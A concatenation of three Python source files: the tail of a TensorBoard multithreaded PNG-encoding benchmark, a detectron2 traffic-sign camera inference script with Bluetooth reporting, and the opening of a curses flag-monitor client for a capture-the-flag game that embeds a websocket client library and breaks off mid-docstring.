THREADS TOTAL_TIME UNIT_TIME SPEEDUP PARALLELISM
1 2.6311 2.6311 1.0000 1.0000
2 2.6070 1.3035 2.0185 1.0092
4 2.7108 0.6777 3.8824 0.9706
6 2.6347 0.4391 5.9917 0.9986
8 3.3163 0.4145 6.3471 0.7934
10 3.5899 0.3590 7.3290 0.7329
12 3.7949 0.3162 8.3198 0.6933
14 6.1140 0.4367 6.0248 0.4303
16 6.2662 0.3916 6.7182 0.4199
32 10.5142 0.3286 8.0077 0.2502
The total time for one thread is the "base time." Speedup is computed by
dividing the unit time by the base time. Effective parallelism is computed
by dividing the speedup by the number of threads used.
Note that the CPU used has six physical cores and twelve virtual cores;
correspondingly, the effective parallelism is excellent with up to six
threads, drops somewhat after six threads, and drops significantly after
twelve threads.
The above numbers are consistent across runs, within about 5%.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import threading
import time
from six.moves import xrange
from absl import app
from absl import logging
import numpy as np
import tensorflow as tf
from tensorboard.util import encoder
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
def bench(image, thread_count):
"""Encode `image` to PNG on `thread_count` threads in parallel.
Returns:
A `float` representing number of seconds that it takes all threads
to finish encoding `image`.
"""
threads = [
threading.Thread(target=lambda: encoder.encode_png(image))
for _ in xrange(thread_count)
]
start_time = datetime.datetime.now()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end_time = datetime.datetime.now()
delta = (end_time - start_time).total_seconds()
return delta
def _image_of_size(image_size):
"""Generate a square RGB test image of the given side length."""
return np.random.uniform(0, 256, [image_size, image_size, 3]).astype(
np.uint8
)
def _format_line(headers, fields):
"""Format a line of a table.
Arguments:
headers: A list of strings that are used as the table headers.
fields: A list of the same length as `headers` where `fields[i]` is
the entry for `headers[i]` in this row. Elements can be of
arbitrary types. Pass `headers` to print the header row.
Returns:
A pretty string.
"""
assert len(fields) == len(headers), (fields, headers)
fields = [
"%2.4f" % field if isinstance(field, float) else str(field)
for field in fields
]
return " ".join(
" " * max(0, len(header) - len(field)) + field
for (header, field) in zip(headers, fields)
)
def main(unused_argv):
logging.set_verbosity(logging.INFO)
np.random.seed(0)
thread_counts = [1, 2, 4, 6, 8, 10, 12, 14, 16, 32]
logger.info("Warming up...")
warmup_image = _image_of_size(256)
for thread_count in thread_counts:
bench(warmup_image, thread_count)
logger.info("Running...")
results = {}
image = _image_of_size(4096)
headers = ("THREADS", "TOTAL_TIME", "UNIT_TIME", "SPEEDUP", "PARALLELISM")
logger.info(_format_line(headers, headers))
for thread_count in thread_counts:
time.sleep(1.0)
total_time = min(
bench(image, thread_count) for _ in xrange(3)
) # best-of-three timing
unit_time = total_time / thread_count
if total_time < 2.0:
logger.warn(
"This benchmark is running too quickly! This "
"may cause misleading timing data. Consider "
"increasing the image size until it takes at "
"least 2.0s to encode one image."
)
results[thread_count] = unit_time
speedup = results[1] / results[thread_count]
parallelism = speedup / thread_count
fields = (thread_count, total_time, unit_time, speedup, parallelism)
logger.info(_format_line(headers, fields))
if __name__ == "__main__":
app.run(main)
|
camera_inference.py | from camera_parameters import *
import torch
import numpy as np
import cv2, os, time, datetime
import random
import detectron2
from bt_server import BTServer
from predictor import MTSDPredictor
from detection_utils import *
from detectron2.config import get_cfg
import threading
import statistics
def gstreamer_pipeline(
capture_width=CAP_WIDTH,
capture_height=CAP_HEIGHT,
display_width=CAP_WIDTH,
display_height=CAP_HEIGHT,
framerate=FPS,
flip_method=0,
):
return (
"nvarguscamerasrc ! "
"video/x-raw(memory:NVMM), "
"width=(int)%d, height=(int)%d, "
"format=(string)NV12, framerate=(fraction)%d/1 ! "
"nvvidconv flip-method=%d ! "
"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"
% (
capture_width,
capture_height,
framerate,
flip_method,
display_width,
display_height,
)
)
class CamVideoWriter:
'''
class for writing the video from the cam
'''
def __init__(self, out):
self.out = out
self.next_id=0
self.curr_id=0
def write(self, frames):
t = threading.Thread(target=self._write_frames, args=[frames])
t.daemon = True
t.start()
return self
def _write_frames(self, frames):
thread_id = self.curr_id
self.curr_id = self.curr_id +1
while(thread_id !=self.next_id):
time.sleep(0.1)
for f in frames:
self.out.write(f)
#print("write")
self.next_id = self.next_id + 1
class InferenceVideoWriter:
'''
class for writing the video of inference
'''
def __init__(self, out):
self.out = out
def write(self, frame, fps):
self.frame = frame
self.fps = fps
self.writing = True
t = threading.Thread(target=self._write_frames)
t.daemon = True
t.start()
return self
def _write_frames(self):
while self.writing:
self.out.write(self.frame)
time.sleep((1/self.fps)* 0.66)
class VideoCapture:
'''
class for reading frames from the camera. It keeps the most recent frame.
'''
def __init__(self, cap):
self.cap = cap
def startReadingFrames(self):
_, self.latest_frame = self.cap.read()
t = threading.Thread(target=(self._read_frames))
t.daemon = True
t.start()
return self
def _read_frames(self):
self.frame_num = 0
read = True
while self.cap.isOpened():
self.frame_num=self.frame_num+1
#self.cap.grab()
#if(i%2==0):
# read, self.latest_frame = self.cap.retrieve()
read, self.latest_frame = self.cap.read()
time.sleep(0.118)
def read(self):
return self.latest_frame
def release(self):
self.cap.release()
def run_camera_inference(bt_server, predictor):
'''
method for running the inference on a live camera image
'''
cap =VideoCapture(cv2.VideoCapture(gstreamer_pipeline(), cv2.CAP_GSTREAMER))
predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
if cap.cap.isOpened():
cap.startReadingFrames()
try:
while True:
tic = time.time()
img = cap.read()
cropped_im = crop_img(img)
visualisation = cropped_im.copy()
if(bt_server.detecting):
outputs = predictor(cv2.resize(cropped_im, (CROPPED_WIDTH, CROPPED_HEIGHT)))
if(len(outputs['instances'])> 0):
bt_server.startSendingDetections(outputs, cropped_im)
# boxes, classes, scores = handle_prediction(outputs)
# boxes, classes, scores = nms(boxes, classes, scores, 0.5)
# for i, box in enumerate(boxes):
# box_top = max(0, box[1] * SCALE_RATIO)
# box_bottom = min(CAP_HEIGHT, box[3] * SCALE_RATIO)
# box_l = max(0, box[0] * SCALE_RATIO)
# box_r = min(CAP_WIDTH, box[2] * SCALE_RATIO)
# visualisation = cv2.rectangle(
# visualisation,
# (int(box_l), int(box_top)),
# (int(box_r), int(box_bottom)),
# (0,255,0),
# 2
# )
# visualisation = cv2.putText(
# visualisation,
# f"{classes[i]}, {scores[i]:.2f}",
# (int(box_l),int(box_top*0.95)),
# cv2.FONT_HERSHEY_SIMPLEX,
# 0.4,
# (0,255,0),
# 1
# )
print("detection time", time.time() - tic)
#cv2.imshow("Camera", visualisation)
if(bt_server.test_required):
bt_server.sendTestImage(img)
try:
bt_server.socket.getpeername()
except:
bt_server.detecting = False
bt_server.startAccepting()
keyCode = cv2.waitKey(30) & 0xFF
if keyCode == 27:
break
cap.cap.release()
cv2.destroyAllWindows()
except KeyboardInterrupt:
print("stopped")
cap.cap.release()
cv2.destroyAllWindows()
else:
print("Unable to open camera")
def run_video_inference(predictor, filename):
'''
method for running the inference on a video file
'''
cap = VideoCapture(cv2.VideoCapture(filename))
name = "output{}".format(datetime.datetime.now().time())
#_out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/inference_out/{}.mp4'.format(name),
# cv2.VideoWriter_fourcc(*'MP4V'), 8, (CAP_WIDTH,CAP_HEIGHT))
#out = InferenceVideoWriter(_out)
predictor(np.zeros((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
predictor(np.ones((CROPPED_WIDTH, CROPPED_HEIGHT,3)))
if cap.cap.isOpened():
#window_handle = cv2.namedWindow("Camera", cv2.WINDOW_AUTOSIZE)
cap.startReadingFrames()
fpss = []
detections=[]
starttime = time.time()
#writing_started = False
videostarttime=None
try:
tic = time.time()
while True:
detection = False
img = cap.read()
if(img is None):
break
#visualisation = img
cropped_im = crop_img(img)
#cropped_im = img
visualisation = img#cropped_im#.copy()
outputs = predictor(cv2.resize(cropped_im, (CROPPED_WIDTH, CROPPED_HEIGHT)))
if(len(outputs['instances'])> 0):
detection=True
#print("detection")
#bt_server.startSendingDetections(outputs, cropped_im)
boxes, classes, scores = handle_prediction(outputs)
boxes, classes, scores = nms(boxes, classes, scores, 0.5)
for i, box in enumerate(boxes):
detections.append((int(time.time() - starttime), f"{classes[i]}, {scores[i]:.2f}", cap.frame_num))
box_top = max(0, box[1] * SCALE_RATIO + 0.1 * CAP_HEIGHT)
box_bottom = min(CAP_HEIGHT, box[3] * SCALE_RATIO + 0.1 * CAP_HEIGHT)
box_l = max(0, box[0] * SCALE_RATIO + 0.25 * CAP_WIDTH)
box_r = min(CAP_WIDTH, box[2] * SCALE_RATIO + 0.25 * CAP_WIDTH)
visualisation = cv2.rectangle(
visualisation,
(int(box_l), int(box_top)),
(int(box_r), int(box_bottom)),
(0,255,0),
2
)
visualisation = cv2.putText(
visualisation,
f"{classes[i]}, {scores[i]:.2f}",
(int(box_l),int(box_top*0.95)),
cv2.FONT_HERSHEY_SIMPLEX,
0.6,
(0,255,0),
1
)
det_time = time.time() - tic
if(cap.frame_num%10==0):
print(det_time)
fps = 1/det_time
fpss.append((fps, detection))
visualisation = cv2.putText(visualisation, "{:.2f}".format(fps),(12,20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2)
#cv2.imshow("Camera", visualisation)
if(videostarttime is None):
videostarttime=time.time()
#if(not writing_started):
# out.write(visualisation, 9)
# writing_started = True
#out.frame = visualisation
# keyCode = cv2.waitKey(1) & 0xFF
# if keyCode == 27:
# break
#print("whole time", time.time() - tic)
tic = time.time()
time.sleep(0.5)
#out.writing = False
duration = time.time() - starttime
print("duration", duration)
print("videoduration", time.time() - videostarttime)
no_det_fpss = [f[0] for f in fpss if not f[1]][2:]
det_fpss = [f[0] for f in fpss if f[1]][2:]
all_fpss = [f[0] for f in fpss]
avg_fps_det = statistics.mean(det_fpss)
std_fps_det = statistics.stdev(det_fpss)
max_fps_det = max(det_fpss)
min_fps_det = min(det_fpss)
avg_fps_nodet = statistics.mean(no_det_fpss)
std_fps_nodet = statistics.stdev(no_det_fpss)
max_fps_nodet = max(no_det_fpss)
min_fps_nodet = min(no_det_fpss)
avg_fps_all = statistics.mean(all_fpss)
std_fps_all = statistics.stdev(all_fpss)
max_fps_all = max(all_fpss)
min_fps_all = min(all_fpss)
with open("results_{}.txt".format(datetime.datetime.now()),'w+') as f:
f.write(f"filename: {filename}\n")
f.write(f"duration: {duration}\n")
f.write(f"\nframes with detected signs:\n")
f.write(f"avg fps: {avg_fps_det}\n")
f.write(f"std fps: {std_fps_det}\n")
f.write(f"max fps: {max_fps_det}\n")
f.write(f"min fps: {min_fps_det}\n")
f.write(f"\nframes without detected signs:\n")
f.write(f"avg fps: {avg_fps_nodet}\n")
f.write(f"std fps: {std_fps_nodet}\n")
f.write(f"max fps: {max_fps_nodet}\n")
f.write(f"min fps: {min_fps_nodet}\n")
f.write(f"\nframes total:\n")
f.write(f"avg fps: {avg_fps_all}\n")
f.write(f"std fps: {std_fps_all}\n")
f.write(f"max fps: {max_fps_all}\n")
f.write(f"min fps: {min_fps_all}\n")
f.write("\ndetections:\n")
for d in detections:
f.write(f"{d[0]}, {d[1]}, second {d[2]/FPS}\n")
cap.release()
cv2.destroyAllWindows()
except KeyboardInterrupt:
out.writing = False
print("stopped")
cap.release()
cv2.destroyAllWindows()
def record_and_save(bt_server):
'''
method for recording and saving the video file
'''
cap = cv2.VideoCapture(gstreamer_pipeline(flip_method=0, framerate=FPS+1), cv2.CAP_GSTREAMER)
while not bt_server.detecting:
_, img = cap.read()
if(bt_server.test_required):
bt_server.sendTestImage(img)
name = "output{}".format(datetime.datetime.now().time())
_out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.mp4'.format(name),
cv2.VideoWriter_fourcc(*'MP4V'), FPS, (CAP_WIDTH,CAP_HEIGHT))
out = CamVideoWriter(_out)
fpss =0
i=0
start = time.time()
frames = []
try:
while bt_server.detecting:
i=i+1
tic = time.time()
ret, frame = cap.read()
#print("read_fps:", 1/(time.time()-tic))
if ret:
#frame = cv2.flip(frame,0)
frames.append(frame)
if(len(frames)==30):
out.write(frames)
frames=[]
#cv2.imshow('frame',frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
if(bt_server.test_required):
bt_server.sendTestImage(frame)
else:
break
try:
bt_server.socket.getpeername()
except:
bt_server.detecting = False
#bt_server.startAccepting()
#time.sleep(max(0,(1/FPS) - (time.time() - tic)))
fps = 1/(time.time() - tic)
fpss=fpss + fps#.append(fps)
if(i%(FPS*5)==0):
print(fpss/i)
print(str(out.next_id),"/", str(out.curr_id))
i=0
fpss=0
duration = time.time() - start
while(out.curr_id > out.next_id):
print(str(out.next_id),"/",str(out.curr_id))
time.sleep(2)
# out = cv2.VideoWriter('/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.mp4'.format(name),
# cv2.VideoWriter_fourcc(*'MP4V'), FPS, (CAP_WIDTH,CAP_HEIGHT))
#[out.write(f) for f in frames]
write_duration =time.time()-start-duration
with open("/home/pkos/workspace/praca_inzynierska/jetson_app/outputs/{}.txt".format(name), 'w+') as f:
f.write(str(duration))
f.write("\n")
f.write(str(write_duration))
print("duration", duration)
print("write duration", time.time() - start - duration)
except KeyboardInterrupt:
print("duration", time.time() - start)
# cap.release()i
# out.release()
# cv2.destroyAllWindows()
if __name__ == "__main__":
bt_server = BTServer()
bt_server.startAdvertising()
cfg = get_cfg() # obtain detectron2's default config
cfg.merge_from_file("config.yml")
cfg.MODEL.WEIGHTS = os.path.join("./model_final.pth")
cfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.35
cfg.INPUT.MIN_SIZE_TEST = CROPPED_HEIGHT
cfg.INPUT.MAX_SIZE_TEST = CROPPED_WIDTH
predictor = MTSDPredictor(cfg)
print("loaded predictor")
#run_video_inference(predictor, "./outputs/output11_13.mp4")#predictor)
run_camera_inference(bt_server, predictor)
#record_and_save(bt_server)
|
BotMonitor.py | #!/usr/bin/env python
"""
Created on Apr 23, 2012
@author: moloch
---------
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
---------
Linux/OSX only (well anything with curses really)
Small program used by teams to monitor their flags
For the sake of portability everything is in one file
"""
###################
# > Imports
###################
import os
import sys
import time
import json
import uuid
import array
import struct
import base64
import socket
import random
import hashlib
import logging
import argparse
import platform
import threading
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from datetime import datetime
try:
import curses
import curses.panel
except ImportError:
sys.stdout.write("Error: Failed to import curses, platform not supported\n")
os._exit(2)
###################
# > Constants
###################
BUFFER_SIZE = 64
MIN_Y = 24
MIN_X = 80
###################
# > Defaults
###################
__version__ = "0.1.1"
__port__ = "8888"
__domain__ = "localhost"
__path__ = "/botnet/climonitor"
__log__ = "bot_monitor.log"
###################
# > Logging
###################
LOG_LEVELS = {
"notset": logging.NOTSET,
"debug": logging.DEBUG,
"info": logging.INFO,
"critical": logging.CRITICAL,
"warn": logging.WARN,
"error": logging.ERROR,
"fatal": logging.FATAL,
}
logger = logging.getLogger()
###################
# > Websockets
###################
"""
websocket python client.
=========================
This version support only hybi-13.
Please see http://tools.ietf.org/html/rfc6455 for protocol.
"""
# websocket supported version.
VERSION = 13
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
class WebSocketException(Exception):
"""
websocket exception class.
"""
pass
class WebSocketConnectionClosedException(WebSocketException):
"""
If remote host closed the connection or some network error happened,
this exception will be raised.
"""
pass
default_timeout = None
traceEnabled = False
def enableTrace(traceable):
"""
turn on/off the traceability.
traceable: boolean value. if set True, traceability is enabled.
"""
global traceEnabled
traceEnabled = traceable
if traceable:
logger.setLevel(logging.DEBUG)
def setdefaulttimeout(timeout):
"""
Set the global timeout setting to connect.
timeout: default socket timeout time. This value is second.
"""
global default_timeout
default_timeout = int(timeout)
if default_timeout < 30:
default_timeout = 30
logging.info("Socket timeout set to: %d" % timeout)
def getdefaulttimeout():
"""
Return the global timeout setting(second) to connect.
"""
return default_timeout
def _parse_url(url):
"""
parse url and the result is tuple of
(hostname, port, resource path and the flag of secure mode)
url: url string.
"""
if ":" not in url:
raise ValueError("url is invalid")
scheme, url = url.split(":", 1)
parsed = urlparse(url, scheme="http")
if parsed.hostname:
hostname = parsed.hostname
else:
raise ValueError("hostname is invalid")
port = 0
if parsed.port:
port = parsed.port
is_secure = False
if scheme == "ws":
if not port:
port = 80
elif scheme == "wss":
is_secure = True
if not port:
port = 443
else:
raise ValueError("scheme %s is invalid" % scheme)
if parsed.path:
resource = parsed.path
else:
resource = "/"
if parsed.query:
resource += "?" + parsed.query
return (hostname, port, resource, is_secure)
def create_connection(url, timeout=None, **options):
"""
connect to url and return websocket object.
Connect to url and return the WebSocket object.
Passing optional timeout parameter will set the timeout on the socket.
If no timeout is supplied, the global default timeout setting returned by getdefaulttimeout() is used.
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> conn = create_connection("ws://echo.websocket.org/",
... header=["User-Agent: MyProgram",
... "x-custom: header"])
timeout: socket timeout time. This value is integer.
if you set None for this value, it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value, the custom HTTP headers are added.
"""
sockopt = options.get("sockopt", ())
websock = WebSocket(sockopt=sockopt)
actual_timeout = timeout is not None and timeout or default_timeout
logging.info("[Socket] Timeout: %d" % actual_timeout)
websock.settimeout(actual_timeout)
websock.connect(url, **options)
return websock
_MAX_INTEGER = (1 << 32) - 1
_AVAILABLE_KEY_CHARS = range(0x21, 0x2F + 1) + range(0x3A, 0x7E + 1)
_MAX_CHAR_BYTE = (1 << 8) - 1
# ref. Websocket gets an update, and it breaks stuff.
# http://axod.blogspot.com/2010/06/websocket-gets-update-and-it-breaks.html
def _create_sec_websocket_key():
uid = uuid.uuid4()
return base64.encodestring(uid.bytes).strip()
_HEADERS_TO_CHECK = {"upgrade": "websocket", "connection": "upgrade"}
class _SSLSocketWrapper(object):
def __init__(self, sock):
self.ssl = socket.ssl(sock)
def recv(self, bufsize):
return self.ssl.read(bufsize)
def send(self, payload):
return self.ssl.write(payload)
_BOOL_VALUES = (0, 1)
def _is_bool(*values):
for v in values:
if v not in _BOOL_VALUES:
return False
return True
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xA
# available operation code value tuple
OPCODES = (OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong",
}
# data length threshold.
LENGTH_7 = 0x7D
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(
self, fin=0, rsv1=0, rsv2=0, rsv3=0, opcode=OPCODE_TEXT, mask=1, data=""
):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
self.data = data
self.get_mask_key = os.urandom
@staticmethod
def create_frame(data, opcode):
"""
create frame to send text, binary and other data.
data: data to send. This is string value(byte array).
if opcode is OPCODE_TEXT and this value is unicode,
data value is converted into unicode string, automatically.
opcode: operation code. please see OPCODE_XXX.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, unicode):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(1, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if not _is_bool(self.fin, self.rsv1, self.rsv2, self.rsv3):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(
self.fin << 7
| self.rsv1 << 6
| self.rsv2 << 5
| self.rsv3 << 4
| self.opcode
)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7E)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7F)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
return mask_key + "".join(s)
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
_m = array.array("B", mask_key)
_d = array.array("B", data)
for i in xrange(len(_d)):
_d[i] ^= _m[i % 4]
return _d.tostring()
class WebSocket(object):
"""
Low level WebSocket interface.
This class is based on
The WebSocket protocol draft-hixie-thewebsocketprotocol-76
http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
We can connect to the websocket server and send/receive data.
The following example is a echo client.
>>> import websocket
>>> ws = websocket.WebSocket()
>>> ws.connect("ws://echo.websocket.org")
>>> ws.send("Hello, Server")
>>> ws.recv()
'Hello, Server'
>>> ws.close()
get_mask_key: a callable to produce new mask keys, see the set_mask_key
function's docstring for more details
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setsockopt.
"""
def __init__(self, get_mask_key=None, sockopt=()):
"""
Initialize WebSocket object.
"""
self.connected = False
self.monitor = None
self.io_sock = self.sock = socket.socket()
for opts in sockopt:
self.sock.setsockopt(*opts)
self.get_mask_key = get_mask_key
def set_mask_key(self, func):
"""
set function to create musk key. You can customize mask key generator.
Mainly, this is for testing purpose.
func: callable object. the fuct must 1 argument as integer.
The argument means length of mask key.
This func must be return string(byte array),
which length is argument specified.
"""
self.get_mask_key = func
def settimeout(self, timeout):
"""
Set the timeout to the websocket.
timeout: timeout time(second).
"""
self.sock.settimeout(timeout)
def gettimeout(self):
"""
Get the websocket timeout(second).
"""
return self.sock.gettimeout()
def connect(self, url, **options):
"""
Connect to url. url is websocket url scheme. ie. ws://host:port/resource
You can customize using 'options'.
If you set "header" dict object, you can set your own custom header.
>>> ws = WebSocket()
>>> ws.connect("ws://echo.websocket.org/",
... header={"User-Agent: MyProgram",
... "x-custom: header"})
timeout: socket timeout time. This value is integer.
if you set None for this value,
it means "use default_timeout value"
options: current support option is only "header".
if you set header as dict value,
the custom HTTP headers are added.
"""
hostname, port, resource, is_secure = _parse_url(url)
# TODO: we need to support proxy
self.sock.connect((hostname, port))
if is_secure:
self.io_sock = _SSLSocketWrapper(self.sock)
self._handshake(hostname, port, resource, **options)
def _handshake(self, host, port, resource, **options):
sock = self.io_sock
headers = []
headers.append("GET %s HTTP/1.1" % resource)
headers.append("Upgrade: websocket")
headers.append("Connection: Upgrade")
if port == 80:
hostport = host
else:
hostport = "%s:%d" % (host, port)
headers.append("Host: %s" % hostport)
if "origin" in options:
headers.append("Origin: %s" % options["origin"])
else:
headers.append("Origin: http://%s" % hostport)
key = _create_sec_websocket_key()
headers.append("Sec-WebSocket-Key: %s" % key)
headers.append("Sec-WebSocket-Version: %s" % VERSION)
if "header" in options:
headers.extend(options["header"])
headers.append("")
headers.append("")
header_str = "\r\n".join(headers)
sock.send(header_str)
if traceEnabled:
logger.debug("--- request header ---")
logger.debug(header_str)
logger.debug("-----------------------")
status, resp_headers = self._read_headers()
if status != 101:
self.close()
raise WebSocketException("Handshake Status %d" % status)
success = self._validate_header(resp_headers, key)
if not success:
self.close()
raise WebSocketException("Invalid WebSocket Header")
self.connected = True
def _validate_header(self, headers, key):
for k, v in _HEADERS_TO_CHECK.iteritems():
r = headers.get(k, None)
if not r:
return False
r = r.lower()
if v != r:
return False
result = headers.get("sec-websocket-accept", None)
if not result:
return False
result = result.lower()
value = key + "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
hashed = base64.encodestring(hashlib.sha1(value).digest()).strip().lower()
return hashed == result
def _read_headers(self):
status = None
headers = {}
if traceEnabled:
logger.debug("--- response header ---")
while True:
line = self._recv_line()
if line == "\r\n":
break
line = line.strip()
if traceEnabled:
logger.debug(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
headers[key.lower()] = value.strip().lower()
else:
raise WebSocketException("Invalid header")
if traceEnabled:
logger.debug("-----------------------")
return status, headers
def send(self, payload, opcode=ABNF.OPCODE_TEXT):
"""
Send the data as string.
payload: Payload must be utf-8 string or unicode,
if the opcode is OPCODE_TEXT.
Otherwise, it must be string(byte array)
opcode: operation code to send. Please see OPCODE_XXX.
"""
frame = ABNF.create_frame(payload, opcode)
if self.get_mask_key:
frame.get_mask_key = self.get_mask_key
data = frame.format()
while data:
l = self.io_sock.send(data)
data = data[l:]
if traceEnabled:
logger.debug("send: " + repr(data))
def ping(self, payload=""):
"""
send ping data.
payload: data payload to send server.
"""
logging.debug("Got <- PING")
self.send(payload, ABNF.OPCODE_PING)
def pong(self, payload):
"""
send pong data.
payload: data payload to send server.
"""
logging.debug("Sending -> PONG")
self.monitor.pong = True
self.send(payload, ABNF.OPCODE_PONG)
def recv(self):
"""
Receive string data(byte array) from the server.
return value: string(byte array) value.
"""
opcode, data = self.recv_data()
return data
def recv_data(self):
"""
Receive data with operation code.
return value: tuple of operation code and string(byte array) value.
"""
while True:
frame = self.recv_frame()
if not frame:
# handle error:
# 'NoneType' object has no attribute 'opcode'
raise WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
return (frame.opcode, frame.data)
elif frame.opcode == ABNF.OPCODE_CLOSE:
self.send_close()
return (frame.opcode, None)
elif frame.opcode == ABNF.OPCODE_PING:
self.pong(frame.data)
def recv_frame(self):
"""
receive data as frame from server.
return value: ABNF frame object.
"""
header_bytes = self._recv_strict(2)
if not header_bytes:
return None
b1 = ord(header_bytes[0])
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xF
b2 = ord(header_bytes[1])
mask = b2 >> 7 & 1
length = b2 & 0x7F
length_data = ""
if length == 0x7E:
length_data = self._recv_strict(2)
length = struct.unpack("!H", length_data)[0]
elif length == 0x7F:
length_data = self._recv_strict(8)
length = struct.unpack("!Q", length_data)[0]
mask_key = ""
if mask:
mask_key = self._recv_strict(4)
data = self._recv_strict(length)
if traceEnabled:
received = header_bytes + length_data + mask_key + data
logger.debug("recv: " + repr(received))
if mask:
data = ABNF.mask(mask_key, data)
frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, mask, data)
return frame
def send_close(self, status=STATUS_NORMAL, reason=""):
"""
send close data to the server.
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
def close(self, status=STATUS_NORMAL, reason=""):
"""
Close Websocket object
status: status code to send. see STATUS_XXX.
reason: the reason to close. This must be string.
"""
if self.connected:
if status < 0 or status >= ABNF.LENGTH_16:
raise ValueError("code is invalid range")
try:
self.send(struct.pack("!H", status) + reason, ABNF.OPCODE_CLOSE)
timeout = self.sock.gettimeout()
self.sock.settimeout(3)
try:
frame = self.recv_frame()
if logger.isEnabledFor(logging.ERROR):
recv_status = struct.unpack("!H", frame.data)[0]
if recv_status != STATUS_NORMAL:
logger.error("close status: " + repr(recv_status))
except:
pass
self.sock.settimeout(timeout)
self.sock.shutdown(socket.SHUT_RDWR)
except:
pass
self._closeInternal()
def _closeInternal(self):
self.connected = False
self.sock.close()
self.io_sock = self.sock
def _recv(self, bufsize):
bytes = self.io_sock.recv(bufsize)
if not bytes:
raise WebSocketConnectionClosedException()
return bytes
def _recv_strict(self, bufsize):
remaining = bufsize
bytes = ""
while remaining:
bytes += self._recv(remaining)
remaining = bufsize - len(bytes)
return bytes
def _recv_line(self):
line = []
while True:
c = self._recv(1)
line.append(c)
if c == "\n":
break
return "".join(line)
class WebSocketApp(object):
"""
Higher level of APIs are provided.
The interface is like JavaScript WebSocket object.
"""
def __init__(
self,
url,
header=None,
on_open=None,
on_message=None,
on_error=None,
on_close=None,
keep_running=True,
get_mask_key=None,
sockopt=(),
):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The argument is this class object.
